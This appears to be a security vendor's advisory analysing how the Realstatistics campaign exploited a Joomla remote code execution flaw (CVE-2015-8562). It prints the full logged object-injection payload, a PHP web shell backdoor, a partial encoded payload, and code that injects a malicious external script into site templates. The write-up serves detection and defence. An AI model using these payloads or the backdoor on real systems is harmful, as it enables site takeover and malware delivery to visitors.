New Realstatistics Attack Vector Compromising Joomla Sites

Nov 2016 Update: If your Joomla site has been hacked, you can follow our guide to fixing it.

Read the Guide!

Over the past few weeks we’ve seen a large number of Joomla websites compromised with the Realstatistics malware campaign. This mass infection is still evolving and continues to distribute harmful ransomware to compromised website visitors.

Today we are providing more context on the new attack vector and exploitation process used to to compromise these sites.

Joomla CVE-2015-8562

The initial attack vector is a variation of the Remote Command Execution vulnerability in Joomla that was heavily exploited at the end of last year. Despite the fact that it has been patched, we still see many attempts to exploit this vulnerability using the original methods we disclosed. Almost all web application firewalls have now virtually patched this variation of the exploit. As a result, we see fewer successful attempts at compromising Joomla sites with this older vulnerability.

The new variation we discovered is using a new vector with the filter-search option which hasn’t yet been disclosed.  This results in a far higher success rate, and has a lot to do with why the Realstatistics malware campaign is successful in compromising a high number of sites in such a short period of time.

New Attack Vector

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400] 
"POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 
"POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD"

As you can see from the date stamp, the initial vulnerability was exploited in June, but we didn’t see attempts to access the backdoor until the beginning of July:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400] 
"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 
"POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B"

With this request, attackers are simply testing whether the backdoor installation was successful or not.

The content of this backdoor is common to many backdoors we see:

<?php if(isset($_POST["php_func"])){@$_POST["php_func"](stripslashes($_POST["php"]));};?>

Payload

After the attempts to see whether the backdoor was successful or not, attackers attempt to inject the payload utilizing the backdoor.

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400] 
"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 
"POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

That is just part of the encoded payload in the request above, but after decoding the full payload this is the result:

print "KeyCheckFront";
...

$inj_code = '<script language="JavaScript" type="text/JavaScript" 

src="hxxp://realstatistics[.]pro/js/analytics.php?id=123"></script>';

//$inj_code = '<!-- lol777 -->';

$inj_search = '</head>';
...

As you can see from the code, the payload is injecting fake Realstatistics analytics code into the head section of any PHP template on the site.

Check Your Joomla Sites

This infection is only impacting unpatched Joomla sites, so make sure that your Joomla sites are up-to-date. This is a new attack vector on an old vulnerability, so if you can’t patch, you should be sure your website firewall is virtually patching this new variation.

We recommend checking your logs for requests from 46 .183 .219 .91 – if you find requests similar to the ones in this post, consider your website compromised. At this point you should take steps to remove the malware immediately and prevent reinfection.

If you are using our CloudProxy Website Firewall, your site is protected against this vulnerability through our virtual patching feature.  Our incident response team is always standing by ready to assist you in cleaning and protecting your site if you need assistance.